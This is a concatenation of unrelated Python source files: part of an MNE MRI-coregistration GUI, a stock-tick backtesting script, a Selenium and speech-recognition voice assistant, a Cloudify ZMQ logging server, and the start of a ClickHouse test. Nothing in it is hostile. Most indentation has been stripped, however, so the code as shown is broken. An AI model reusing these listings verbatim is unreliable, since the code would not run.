VGrid(Item('trans_x', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"right-left axis"),
'trans_x_dec', 'trans_x_inc',
Item('trans_step', tooltip="Movement step"),
Item('trans_y', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"anterior-posterior axis"),
'trans_y_dec', 'trans_y_inc',
Label('(Step)'),
Item('trans_z', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"anterior-posterior axis"),
'trans_z_dec', 'trans_z_inc',
show_labels=False, columns=4),
Label("Rotation:"),
VGrid(Item('rot_x', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"right-left axis"),
'rot_x_dec', 'rot_x_inc',
Item('rot_step', tooltip="Rotation step"),
Item('rot_y', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"anterior-posterior axis"),
'rot_y_dec', 'rot_y_inc',
Label('(Step)'),
Item('rot_z', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"anterior-posterior axis"),
'rot_z_dec', 'rot_z_inc',
show_labels=False, columns=4),
# buttons
HGroup(Item('fit_hsp_points',
enabled_when='has_pts_data',
tooltip="Rotate the head shape (around the "
"nasion) so as to minimize the distance "
"from each head shape point to its closest "
"MRI point"),
Item('fit_ap', enabled_when='has_fid_data',
tooltip="Try to match the LPA and the RPA, "
"leaving the Nasion in place"),
Item('fit_fid', enabled_when='has_fid_data',
tooltip="Move and rotate the head shape so "
"as to minimize the distance between the "
"MRI and head shape fiducials"),
Item('load_trans', enabled_when='has_fid_data'),
show_labels=False),
'_',
Item('fid_eval_str', style='readonly'),
Item('points_eval_str', style='readonly'),
'_',
HGroup(Item('prepare_bem_model'),
Label("Run mne_prepare_bem_model"),
show_labels=False,
enabled_when='can_prepare_bem_model'),
HGroup(Item('save', enabled_when='can_save',
tooltip="Save the trans file and (if "
"scaling is enabled) the scaled MRI"),
Item('reset_params', tooltip="Reset all "
"coregistration parameters"),
show_labels=False),
Item('queue_feedback', style='readonly'),
Item('queue_current', style='readonly'),
Item('queue_len_str', style='readonly'),
show_labels=False),
kind='panel', buttons=[UndoButton])
def __init__(self, *args, **kwargs):
super(CoregPanel, self).__init__(*args, **kwargs)
# setup save worker
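# queue items are (description, callable, args, kwargs) tuples as produced by
# CoregModel.get_scaling_job() and get_prepare_bem_model_job()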
def worker():
while True:
desc, cmd, args, kwargs = self.queue.get()
self.queue_len -= 1
self.queue_current = 'Processing: %s' % desc
# task
try:
cmd(*args, **kwargs)
except Exception as err:
self.error = str(err)
res = "Error in %s"
else:
res = "Done: %s"
# finalize
self.queue_current = ''
self.queue_feedback = res % desc
self.queue.task_done()
t = Thread(target=worker)
t.daemon = True
t.start()
@cached_property
def _get_queue_len_str(self):
if self.queue_len:
return "Queue length: %i" % self.queue_len
else:
return ''
@cached_property
def _get_rotation(self):
rot = np.array([self.rot_x, self.rot_y, self.rot_z])
return rot
@cached_property
def _get_src_pts(self):
return self.hsp_pts - self.hsp_fid[0]
@cached_property
def _get_src_fid(self):
return self.hsp_fid - self.hsp_fid[0]
@cached_property
def _get_tgt_origin(self):
return self.mri_fid[0] * self.scale
@cached_property
def _get_tgt_pts(self):
pts = self.mri_pts * self.scale
pts -= self.tgt_origin
return pts
@cached_property
def _get_tgt_fid(self):
fid = self.mri_fid * self.scale
fid -= self.tgt_origin
return fid
@cached_property
def _get_translation(self):
trans = np.array([self.trans_x, self.trans_y, self.trans_z])
return trans
def _fit_ap_fired(self):
GUI.set_busy()
self.model.fit_auricular_points()
GUI.set_busy(False)
def _fit_fid_fired(self):
GUI.set_busy()
self.model.fit_fiducials()
GUI.set_busy(False)
def _fit_hsp_points_fired(self):
GUI.set_busy()
self.model.fit_hsp_points()
GUI.set_busy(False)
def _fits_ap_fired(self):
GUI.set_busy()
self.model.fit_scale_auricular_points()
GUI.set_busy(False)
def _fits_fid_fired(self):
GUI.set_busy()
self.model.fit_scale_fiducials()
GUI.set_busy(False)
def _fits_hsp_points_fired(self):
GUI.set_busy()
self.model.fit_scale_hsp_points()
GUI.set_busy(False)
def _n_scale_params_changed(self, new):
if not new:
return
# Make sure that MNE_ROOT environment variable is set
if not set_mne_root(True):
err = ("MNE_ROOT environment variable could not be set. "
"You will be able to scale MRIs, but the "
"mne_prepare_bem_model tool will fail. Please install "
"MNE.")
warning(None, err, "MNE_ROOT Not Set")
def _reset_params_fired(self):
self.model.reset()
def _rot_x_dec_fired(self):
self.rot_x -= self.rot_step
def _rot_x_inc_fired(self):
self.rot_x += self.rot_step
def _rot_y_dec_fired(self):
self.rot_y -= self.rot_step
def _rot_y_inc_fired(self):
self.rot_y += self.rot_step
def _rot_z_dec_fired(self):
self.rot_z -= self.rot_step
def _rot_z_inc_fired(self):
self.rot_z += self.rot_step
def _load_trans_fired(self):
# find trans file destination
raw_dir = os.path.dirname(self.model.hsp.file)
subject = self.model.mri.subject
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject)
dlg = FileDialog(action="open", wildcard=trans_wildcard,
default_path=trans_file)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
self.model.load_trans(trans_file)
def _save_fired(self):
if self.n_scale_params:
subjects_dir = self.model.mri.subjects_dir
subject_from = self.model.mri.subject
subject_to = self.model.raw_subject or self.model.mri.subject
else:
subject_to = self.model.mri.subject
# ask for target subject
if self.n_scale_params:
mridlg = NewMriDialog(subjects_dir=subjects_dir,
subject_from=subject_from,
subject_to=subject_to)
ui = mridlg.edit_traits(kind='modal')
if ui.result != True: # noqa
return
subject_to = mridlg.subject_to
# find bem file to run mne_prepare_bem_model
if self.can_prepare_bem_model and self.prepare_bem_model:
bem_job = self.model.get_prepare_bem_model_job(subject_to)
else:
bem_job = None
# find trans file destination
raw_dir = os.path.dirname(self.model.hsp.file)
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject_to)
dlg = FileDialog(action="save as", wildcard=trans_wildcard,
default_path=trans_file)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
if not trans_file.endswith('.fif'):
trans_file = trans_file + '.fif'
        if os.path.exists(trans_file):
            answer = confirm(None, "The file %r already exists. Should it "
                             "be replaced?" % trans_file, "Overwrite File?")
if answer != YES:
return
# save the trans file
try:
self.model.save_trans(trans_file)
except Exception as e:
error(None, str(e), "Error Saving Trans File")
return
# save the scaled MRI
if self.n_scale_params:
job = self.model.get_scaling_job(subject_to)
self.queue.put(job)
self.queue_len += 1
if bem_job is not None:
self.queue.put(bem_job)
self.queue_len += 1
def _scale_x_dec_fired(self):
step = 1. / self.scale_step
self.scale_x *= step
def _scale_x_inc_fired(self):
self.scale_x *= self.scale_step
def _scale_x_changed(self, old, new):
if self.n_scale_params == 1:
self.scale_y = new
self.scale_z = new
def _scale_y_dec_fired(self):
step = 1. / self.scale_step
self.scale_y *= step
def _scale_y_inc_fired(self):
self.scale_y *= self.scale_step
def _scale_z_dec_fired(self):
step = 1. / self.scale_step
self.scale_z *= step
def _scale_z_inc_fired(self):
self.scale_z *= self.scale_step
def _trans_x_dec_fired(self):
self.trans_x -= self.trans_step
def _trans_x_inc_fired(self):
self.trans_x += self.trans_step
def _trans_y_dec_fired(self):
self.trans_y -= self.trans_step
def _trans_y_inc_fired(self):
self.trans_y += self.trans_step
def _trans_z_dec_fired(self):
self.trans_z -= self.trans_step
def _trans_z_inc_fired(self):
self.trans_z += self.trans_step
class NewMriDialog(HasPrivateTraits):
    """Dialog to determine the target subject name for a scaled MRI."""
subjects_dir = Directory
subject_to = Str
subject_from = Str
subject_to_dir = Property(depends_on=['subjects_dir', 'subject_to'])
subject_to_exists = Property(Bool, depends_on='subject_to_dir')
feedback = Str(' ' * 100)
can_overwrite = Bool
overwrite = Bool
can_save = Bool
view = View(Item('subject_to', label='New MRI Subject Name', tooltip="A "
"new folder with this name will be created in the "
"current subjects_dir for the scaled MRI files"),
Item('feedback', show_label=False, style='readonly'),
Item('overwrite', enabled_when='can_overwrite', tooltip="If a "
"subject with the chosen name exists, delete the old "
"subject"),
width=500,
buttons=[CancelButton,
Action(name='OK', enabled_when='can_save')])
def _can_overwrite_changed(self, new):
if not new:
self.overwrite = False
@cached_property
def _get_subject_to_dir(self):
return os.path.join(self.subjects_dir, self.subject_to)
@cached_property
def _get_subject_to_exists(self):
if not self.subject_to:
return False
elif os.path.exists(self.subject_to_dir):
return True
else:
return False
@on_trait_change('subject_to_dir,overwrite')
def update_dialog(self):
if not self.subject_to:
self.feedback = "No subject specified..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to == self.subject_from:
self.feedback = "Must be different from MRI source subject..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to_exists:
if self.overwrite:
self.feedback = "%s will be overwritten." % self.subject_to
self.can_save = True
self.can_overwrite = True
else:
self.feedback = "Subject already exists..."
self.can_save = False
self.can_overwrite = True
else:
self.feedback = "Name ok."
self.can_save = True
self.can_overwrite = False
def _make_view(tabbed=False, split=False, scene_width=-1):
"""Create a view for the CoregFrame
Parameters
----------
tabbed : bool
Combine the data source panel and the coregistration panel into a
single panel with tabs.
split : bool
Split the main panels with a movable splitter (good for QT4 but
unnecessary for wx backend).
scene_width : int
Specify a minimum width for the 3d scene (in pixels).
    Returns
-------
view : traits View
View object for the CoregFrame.
"""
view_options = VGroup(Item('headview', style='custom'), 'view_options',
show_border=True, show_labels=False, label='View')
scene = VGroup(Item('scene', show_label=False,
editor=SceneEditor(scene_class=MayaviScene),
dock='vertical', width=500),
view_options)
data_panel = VGroup(VGroup(Item('subject_panel', style='custom'),
label="MRI Subject", show_border=True,
show_labels=False),
VGroup(Item('lock_fiducials', style='custom',
editor=EnumEditor(cols=2,
values={False: '2:Edit',
True: '1:Lock'}),
enabled_when='fid_ok'),
HGroup('hsp_always_visible',
Label("Always Show Head Shape Points"),
show_labels=False),
Item('fid_panel', style='custom'),
label="MRI Fiducials", show_border=True,
show_labels=False),
VGroup(Item('raw_src', style="custom"),
HGroup(Item('distance', show_label=True),
'omit_points', 'reset_omit_points',
show_labels=False),
Item('omitted_info', style='readonly',
show_label=False),
label='Head Shape Source (Raw)',
show_border=True, show_labels=False),
show_labels=False, label="Data Source")
coreg_panel = VGroup(Item('coreg_panel', style='custom'),
label="Coregistration", show_border=True,
show_labels=False,
enabled_when="fid_panel.locked")
if split:
main_layout = 'split'
else:
main_layout = 'normal'
if tabbed:
main = HGroup(scene,
Group(data_panel, coreg_panel, show_labels=False,
layout='tabbed'),
layout=main_layout)
else:
main = HGroup(data_panel, scene, coreg_panel, show_labels=False,
layout=main_layout)
view = View(main, resizable=True, handler=CoregFrameHandler(),
buttons=NoButtons)
return view
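# A hypothetical call of _make_view, mirroring its documented parameters:
#     view = _make_view(tabbed=False, split=True, scene_width=600)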
class ViewOptionsPanel(HasTraits):
mri_obj = Instance(SurfaceObject)
hsp_obj = Instance(PointObject)
view = View(VGroup(Item('mri_obj', style='custom', # show_border=True,
label="MRI Head Surface"),
Item('hsp_obj', style='custom', # show_border=True,
label="Head Shape Points")),
title="View Options")
class CoregFrame(HasTraits):
"""GUI for head-MRI coregistration
"""
model = Instance(CoregModel, ())
scene = Instance(MlabSceneModel, ())
headview = Instance(HeadViewController)
subject_panel = Instance(SubjectSelectorPanel)
fid_panel = Instance(FiducialsPanel)
coreg_panel = Instance(CoregPanel)
raw_src = DelegatesTo('model', 'hsp')
# Omit Points
distance = Float(5., label="Distance [mm]", desc="Maximal distance for "
"head shape points from MRI in mm")
omit_points = Button(label='Omit Points', desc="Omit head shape points "
"for the purpose of the automatic coregistration "
"procedure.")
reset_omit_points = Button(label='Reset Omission', desc="Reset the "
"omission of head shape points to include all.")
omitted_info = Property(Str, depends_on=['model.hsp.n_omitted'])
fid_ok = DelegatesTo('model', 'mri.fid_ok')
lock_fiducials = DelegatesTo('model')
hsp_always_visible = Bool(False, label="Always Show Head Shape")
# visualization
hsp_obj = Instance(PointObject)
mri_obj = Instance(SurfaceObject)
lpa_obj = Instance(PointObject)
nasion_obj = Instance(PointObject)
rpa_obj = Instance(PointObject)
hsp_lpa_obj = Instance(PointObject)
hsp_nasion_obj = Instance(PointObject)
hsp_rpa_obj = Instance(PointObject)
hsp_visible = Property(depends_on=['hsp_always_visible', 'lock_fiducials'])
view_options = Button(label="View Options")
picker = Instance(object)
view_options_panel = Instance(ViewOptionsPanel)
# Processing
queue = DelegatesTo('coreg_panel')
view = _make_view()
def _subject_panel_default(self):
return SubjectSelectorPanel(model=self.model.mri.subject_source)
def _fid_panel_default(self):
panel = FiducialsPanel(model=self.model.mri, headview=self.headview)
return panel
def _coreg_panel_default(self):
panel = CoregPanel(model=self.model)
return panel
def _headview_default(self):
return HeadViewController(scene=self.scene, system='RAS')
def __init__(self, raw=None, subject=None, subjects_dir=None):
super(CoregFrame, self).__init__()
subjects_dir = get_subjects_dir(subjects_dir)
if (subjects_dir is not None) and os.path.isdir(subjects_dir):
self.model.mri.subjects_dir = subjects_dir
if subject is not None:
self.model.mri.subject = subject
if raw is not None:
self.model.hsp.file = raw
@on_trait_change('scene.activated')
def _init_plot(self):
self.scene.disable_render = True
lpa_color = defaults['lpa_color']
nasion_color = defaults['nasion_color']
rpa_color = defaults['rpa_color']
# MRI scalp
color = defaults['mri_color']
self.mri_obj = SurfaceObject(points=self.model.transformed_mri_points,
color=color, tri=self.model.mri.tris,
scene=self.scene)
# on_trait_change was unreliable, so link it another way:
self.model.mri.on_trait_change(self._on_mri_src_change, 'tris')
self.model.sync_trait('transformed_mri_points', self.mri_obj, 'points',
mutual=False)
self.fid_panel.hsp_obj = self.mri_obj
# MRI Fiducials
point_scale = defaults['mri_fid_scale']
self.lpa_obj = PointObject(scene=self.scene, color=lpa_color,
point_scale=point_scale)
self.model.mri.sync_trait('lpa', self.lpa_obj, 'points', mutual=False)
self.model.sync_trait('scale', self.lpa_obj, 'trans', mutual=False)
self.nasion_obj = PointObject(scene=self.scene, color=nasion_color,
point_scale=point_scale)
self.model.mri.sync_trait('nasion', self.nasion_obj, 'points',
mutual=False)
self.model.sync_trait('scale', self.nasion_obj, 'trans', mutual=False)
self.rpa_obj = PointObject(scene=self.scene, color=rpa_color,
point_scale=point_scale)
self.model.mri.sync_trait('rpa', self.rpa_obj, 'points', mutual=False)
self.model.sync_trait('scale', self.rpa_obj, 'trans', mutual=False)
# Digitizer Head Shape
color = defaults['hsp_point_color']
point_scale = defaults['hsp_points_scale']
p = PointObject(view='cloud', scene=self.scene, color=color,
point_scale=point_scale, resolution=5)
self.hsp_obj = p
self.model.hsp.sync_trait('points', p, mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
# Digitizer Fiducials
point_scale = defaults['hsp_fid_scale']
opacity = defaults['hsp_fid_opacity']
p = PointObject(scene=self.scene, color=lpa_color, opacity=opacity,
point_scale=point_scale)
self.hsp_lpa_obj = p
self.model.hsp.sync_trait('lpa', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
p = PointObject(scene=self.scene, color=nasion_color, opacity=opacity,
point_scale=point_scale)
self.hsp_nasion_obj = p
self.model.hsp.sync_trait('nasion', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
p = PointObject(scene=self.scene, color=rpa_color, opacity=opacity,
point_scale=point_scale)
self.hsp_rpa_obj = p
self.model.hsp.sync_trait('rpa', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
on_pick = self.scene.mayavi_scene.on_mouse_pick
if not _testing_mode():
self.picker = on_pick(self.fid_panel._on_pick, type='cell')
self.headview.left = True
self.scene.disable_render = False
self.view_options_panel = ViewOptionsPanel(mri_obj=self.mri_obj,
hsp_obj=self.hsp_obj)
@cached_property
def _get_hsp_visible(self):
return self.hsp_always_visible or self.lock_fiducials
@cached_property
def _get_omitted_info(self):
if self.model.hsp.n_omitted == 0:
return "No points omitted"
elif self.model.hsp.n_omitted == 1:
return "1 point omitted"
else:
return "%i points omitted" % self.model.hsp.n_omitted
def _omit_points_fired(self):
distance = self.distance / 1000.
self.model.omit_hsp_points(distance)
def _reset_omit_points_fired(self):
self.model.omit_hsp_points(0, True)
@on_trait_change('model.mri.tris')
def _on_mri_src_change(self):
if self.mri_obj is None:
return
if not (np.any(self.model.mri.points) and np.any(self.model.mri.tris)):
self.mri_obj.clear()
return
self.mri_obj.points = self.model.mri.points
self.mri_obj.tri = self.model.mri.tris
self.mri_obj.plot()
# automatically lock fiducials if a good fiducials file is loaded
@on_trait_change('model.mri.fid_file')
def _on_fid_file_loaded(self):
if self.model.mri.fid_file:
self.fid_panel.locked = True
else:
self.fid_panel.locked = False
def _view_options_fired(self):
self.view_options_panel.edit_traits()
|
backfinder.py
|
import os
import sys
import sqlite3
import pandas as pd
from multiprocessing import Process, Queue
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import db_tick, db_backfind
from utility.static import now, strf_time, timedelta_sec, strp_time
class BackFinder:
def __init__(self, q_, code_list_, df_mt_):
self.q = q_
self.code_list = code_list_
self.df_mt = df_mt_
self.Start()
def Start(self):
conn = sqlite3.connect(db_tick)
tcount = len(self.code_list)
for k, code in enumerate(self.code_list):
columns = ['등락율', '시가대비등락율', '고저평균대비등락율', '거래대금', '누적거래대금', '전일거래량대비',
'체결강도', '체결강도차이', '거래대금차이', '전일거래량대비차이']
df_bf = pd.DataFrame(columns=columns)
avgtime = 300
count_cond = 0
df = pd.read_sql(f"SELECT * FROM '{code}'", conn)
df = df.set_index('index')
lasth = len(df) - 1
for h, index in enumerate(df.index):
try:
if code not in self.df_mt['거래대금상위100'][index]:
count_cond = 0
else:
count_cond += 1
except KeyError:
continue
if count_cond < avgtime:
continue
if strp_time('%Y%m%d%H%M%S', index) < \
timedelta_sec(180, strp_time('%Y%m%d%H%M%S', df['VI발동시간'][index])):
continue
if df['현재가'][index] >= df['상승VID5가격'][index]:
continue
if h >= lasth - avgtime:
break
if df['현재가'][h:h + avgtime].max() > df['현재가'][index] * 1.05:
per = df['등락율'][index]
oper = round((df['현재가'][index] / df['시가'][index] - 1) * 100, 2)
hper = df['고저평균대비등락율'][index]
sm = int(df['거래대금'][index])
dm = int(df['누적거래대금'][index])
vp = df['전일거래량대비'][index]
ch = df['체결강도'][index]
gap_ch = round(df['체결강도'][index] - df['체결강도'][h - avgtime:h].mean(), 2)
gap_sm = round(df['거래대금'][index] - df['거래대금'][h - avgtime:h].mean(), 2)
gap_vp = round(df['전일거래량대비'][index] - df['전일거래량대비'][h - avgtime:h].mean(), 2)
                    df_bf.loc[code + index] = per, oper, hper, sm, dm, vp, ch, gap_ch, gap_sm, gap_vp
            print(f' BackFinder scanning ... [{k + 1}/{tcount}]')
self.q.put(df_bf)
conn.close()
class Total:
def __init__(self, q_, last_):
super().__init__()
self.q = q_
self.last = last_
self.Start()
def Start(self):
df = []
k = 0
while True:
data = self.q.get()
df.append(data)
k += 1
if k == self.last:
break
if len(df) > 0:
df = pd.concat(df)
conn = sqlite3.connect(db_backfind)
df.to_sql(f"{strf_time('%Y%m%d')}_tick", conn, if_exists='replace', chunksize=1000)
conn.close()
if __name__ == "__main__":
start = now()
q = Queue()
con = sqlite3.connect(db_tick)
df_name = pd.read_sql("SELECT name FROM sqlite_master WHERE TYPE = 'table'", con)
df_mt = pd.read_sql('SELECT * FROM moneytop', con)
df_mt = df_mt.set_index('index')
con.close()
table_list = list(df_name['name'].values)
table_list.remove('moneytop')
table_list.remove('codename')
last = len(table_list)
w = Process(target=Total, args=(q, last))
w.start()
procs = []
workcount = int(last / 6) + 1
for j in range(0, last, workcount):
code_list = table_list[j:j + workcount]
p = Process(target=BackFinder, args=(q, code_list, df_mt))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
end = now()
    print(f' BackFinder elapsed time: {end - start}')
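    # Work is split into roughly six chunks: with, say, 600 tick tables,
    # workcount = int(600 / 6) + 1 = 101, so the BackFinder processes receive
    # the slices [0:101], [101:202], ..., [505:600] (600 is only an
    # illustrative table count, not a value taken from the database).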
|
voasst.py
|
#!/usr/bin/env python
# Description: Voice assistant that can search the web and query Wolfram Alpha.
# importing speech recognition package from google api
import speech_recognition as sr
import playsound # to play saved mp3 file
from gtts import gTTS # google text to speech
import os # to save/open files
import wolframalpha # to calculate strings into formula
from selenium import webdriver  # to control browser operations
from selenium.webdriver.chrome.options import Options
from threading import Thread
num = 1
def assistant_speaks(output):
global num
# num to rename every audio file
# with different name to remove ambiguity
num += 1
print("voasst : ", output)
toSpeak = gTTS(text = output, lang ='en', slow = False)
# saving the audio file given by google text to speech
file = str(num)+".mp3"
toSpeak.save(file)
# playsound package is used to play the same file.
playsound.playsound(file, True)
os.remove(file)
def get_audio():
rObject = sr.Recognizer()
audio = ''
with sr.Microphone() as source:
print("Speak...")
# recording the audio using speech recognition
audio = rObject.listen(source, phrase_time_limit = 5)
print("Stop.") # limit 5 secs
try:
text = rObject.recognize_google(audio, language ='en-US')
print("You : ", text)
return text
    except Exception:
assistant_speaks("Could not understand your audio, please try again!")
with sr.Microphone() as source:
print("Speak...")
# recording the audio using speech recognition
audio = rObject.listen(source, phrase_time_limit = 5)
print("Stop.") # limit 5 secs
text = rObject.recognize_google(audio, language ='en-US')
return text
def search_web(input):
driver_path = r"C:\webdriver\chromedriver.exe"
brave_path = r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe"
opt = Options()
opt.binary_location = brave_path
# opt.add_argument("--incognito") OPTIONAL
# opt.add_argument("--headless") OPTIONAL
opt.add_argument('--start-maximized')
opt.add_experimental_option('excludeSwitches', ['enable-logging'])
opt.add_argument('--disable-blink-features=AutomationControlled')
driver = webdriver.Chrome(executable_path=driver_path, options=opt)
driver.implicitly_wait(1)
if 'youtube' in input.lower():
assistant_speaks("Opening in youtube")
indx = input.lower().split().index('youtube')
query = input.split()[indx + 1:]
        driver.get("http://www.youtube.com/results?search_query=" + '+'.join(query))
return
elif 'wikipedia' in input.lower():
assistant_speaks("Opening Wikipedia")
indx = input.lower().split().index('wikipedia')
query = input.split()[indx + 1:]
driver.get("https://en.wikipedia.org/wiki/" + '_'.join(query))
return
    else:
        if 'google' in input:
            indx = input.lower().split().index('google')
            query = input.split()[indx + 1:]
            driver.get("https://www.google.com/search?q=" + '+'.join(query))
        elif 'search' in input:
            indx = input.lower().split().index('search')
            query = input.split()[indx + 1:]
            driver.get("https://www.google.com/search?q=" + '+'.join(query))
        else:
            driver.get("https://www.google.com/search?q=" + '+'.join(input.split()))
return
# function used to open application present inside the system.
def open_application(input):
if "brave" in input:
assistant_speaks("Brave browser")
os.startfile(r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe")
return
elif "word" in input:
assistant_speaks("Opening Microsoft Word")
os.startfile(r"C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE")
return
elif "excel" in input:
assistant_speaks("Opening Microsoft Excel")
os.startfile(r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE")
return
else:
assistant_speaks("Application not available")
return
def process_text(input):
try:
if 'search' in input or 'play' in input:
# a basic web crawler using selenium
search_web(input)
return
elif "who are you" in input or "define yourself" in input:
speak = '''Hello, I am Voasst. Your personal Assistant.
I am here to make your life easier. You can command me to perform
            various tasks such as calculating sums or opening applications, et cetera.'''
assistant_speaks(speak)
return
elif "who made you" in input or "created you" in input:
speak = "I have been created by Eduardo Flores."
assistant_speaks(speak)
return
elif "calculate" in input.lower():
# write your wolframalpha app_id here
app_id = "WOLFRAMALPHA_APP_ID"
client = wolframalpha.Client(app_id)
indx = input.lower().split().index('calculate')
query = input.split()[indx + 1:]
res = client.query(' '.join(query))
answer = next(res.results).text
assistant_speaks("The answer is " + answer)
return
elif 'open' in input:
            # another function to open
            # different applications available on the system
open_application(input.lower())
return
else:
assistant_speaks("I can search the web for you, Do you want to continue?")
ans = get_audio()
if 'yes' in str(ans) or 'yeah' in str(ans):
search_web(input)
else:
return
    except Exception:
assistant_speaks("I don't understand, I can search the web for you, Do you want to continue?")
ans = get_audio()
if 'yes' in str(ans) or 'yeah' in str(ans):
search_web(input)
# Driver Code
def active_process():
    assistant_speaks("What's your name, Human?")
    # name = 'Human'
    name = get_audio()
    assistant_speaks("Hello, " + name + '.')
    while True:
        assistant_speaks("What can I do for you?")
        text = get_audio().lower()
        if not text:
            continue
        if "exit" in str(text) or "bye" in str(text) or "sleep" in str(text) or "stop" in str(text):
            assistant_speaks("Ok bye, " + name + '.')
            break
        # calling process_text to process the query
        process_text(text)
if __name__ == "__main__":
    # run the assistant loop in a background thread
    Thread(target=active_process).start()
|
logging_server.py
|
########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import functools
import json
import logging
import logging.handlers
import os
import random
import threading
import tempfile
import zmq
from celery import bootsteps
from celery.bin import Option
from celery.utils.log import get_logger
from cloudify.proxy import server
from cloudify.lru_cache import lru_cache
logger = get_logger(__name__)
LOGFILE_SIZE_BYTES = 5 * 1024 * 1024
LOGFILE_BACKUP_COUNT = 5
def configure_app(app):
app.user_options['worker'].add(
Option('--with-logging-server', action='store_true',
default=False, help='Enable logging server'))
app.user_options['worker'].add(
Option('--logging-server-logdir', action='store',
help='logdir location'))
app.user_options['worker'].add(
Option('--logging-server-handler-cache-size', action='store',
type='int', default=100,
help='Maximum number of file handlers that can be open at any '
'given time'))
app.steps['worker'].add(ZMQLoggingServerBootstep)
class ZMQLoggingServerBootstep(bootsteps.StartStopStep):
label = 'logging server'
conditional = True
def __init__(self, worker,
with_logging_server=False,
logging_server_logdir=None,
logging_server_handler_cache_size=100,
**kwargs):
worker.logging_server = self
self.enabled = with_logging_server
self.logging_server = None
self.logdir = logging_server_logdir
self.cache_size = logging_server_handler_cache_size
self.thread = None
self.socket_url = None
def info(self, worker):
return {
'logging_server': {
'enabled': self.enabled,
'logdir': self.logdir,
'socket_url': self.socket_url,
'cache_size': self.cache_size
}
}
def start(self, worker):
log_prefix = '| {0}: {1}'.format(type(worker).__name__, self.label)
if not self.enabled:
logger.debug('{0}: enabled={1}'.format(log_prefix, self.enabled))
return
if not self.logdir:
raise ValueError('--logging-server-logdir must be supplied')
if os.name == 'nt':
self.socket_url = 'tcp://127.0.0.1:{0}'.format(
server.get_unused_port())
else:
suffix = '%05x' % random.randrange(16 ** 5)
self.socket_url = ('ipc://{0}/cloudify-logging-server-{1}.socket'
.format(tempfile.gettempdir(), suffix))
if not os.path.exists(self.logdir):
os.makedirs(self.logdir)
self.logging_server = ZMQLoggingServer(socket_url=self.socket_url,
logdir=self.logdir,
cache_size=self.cache_size)
self.thread = threading.Thread(target=self.logging_server.start)
self.thread.start()
logger.debug('{0}: enabled={1}, logdir={2}, socket_url={3}'
.format(log_prefix,
self.enabled,
self.logdir,
self.socket_url))
def _stop_logging_server(self, worker):
if not self.enabled:
return
self.logging_server.close()
stop = _stop_logging_server
close = _stop_logging_server
shutdown = _stop_logging_server
class ZMQLoggingServer(object):
def __init__(self, logdir, socket_url, cache_size):
self.closed = False
self.zmq_context = zmq.Context(io_threads=1)
self.socket = self.zmq_context.socket(zmq.PULL)
self.socket.bind(socket_url)
self.poller = zmq.Poller()
self.poller.register(self.socket, zmq.POLLIN)
self.logdir = logdir
# on the management server, log files are handled by logrotate
# with copytruncate so we use the simple FileHandler.
# on agent hosts, we want to rotate the logs using python's
# RotatingFileHandler.
if os.environ.get('MGMTWORKER_HOME'):
self.handler_func = logging.FileHandler
else:
self.handler_func = functools.partial(
logging.handlers.RotatingFileHandler,
maxBytes=LOGFILE_SIZE_BYTES,
backupCount=LOGFILE_BACKUP_COUNT)
# wrap the _get_handler method with an lru cache decorator
        # so we only keep the last 'cache_size' used handlers and, in turn,
        # have at most 'cache_size' file descriptors open
cache_decorator = lru_cache(maxsize=cache_size,
on_purge=lambda handler: handler.close())
self._get_handler = cache_decorator(self._get_handler)
def start(self):
while not self.closed:
try:
if self.poller.poll(1000):
message = json.loads(self.socket.recv(), encoding='utf-8')
self._process(message)
except Exception:
if not self.closed:
logger.warning('Error raised during record processing',
exc_info=True)
def close(self):
if not self.closed:
self.closed = True
self.socket.close()
self.zmq_context.term()
self._get_handler.clear()
def _process(self, entry):
handler = self._get_handler(entry['context'])
handler.emit(Record(entry['message']))
def _get_handler(self, handler_context):
logfile = os.path.join(self.logdir, '{0}.log'.format(handler_context))
handler = self.handler_func(logfile)
        handler.setFormatter(Formatter())
return handler
class Record(object):
def __init__(self, message):
self.message = message
filename = None
lineno = None
class Formatter(object):
@staticmethod
def format(record):
return record.message
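# A minimal sketch of how a client process could hand a record to this server.
# It is illustrative only: the function name and its arguments are not part of
# cloudify's API, but the JSON shape matches what _process() expects above.
def _example_send_log(socket_url, context, message):
    # PUSH pairs with the PULL socket the server binds to socket_url
    ctx = zmq.Context()
    sock = ctx.socket(zmq.PUSH)
    sock.connect(socket_url)
    try:
        sock.send_string(json.dumps({'context': context, 'message': message}))
    finally:
        sock.close()
        ctx.term()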
|
test.py
|
import gzip
import json
import logging
import os
import io
import random
import threading
import time
import helpers.client
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance
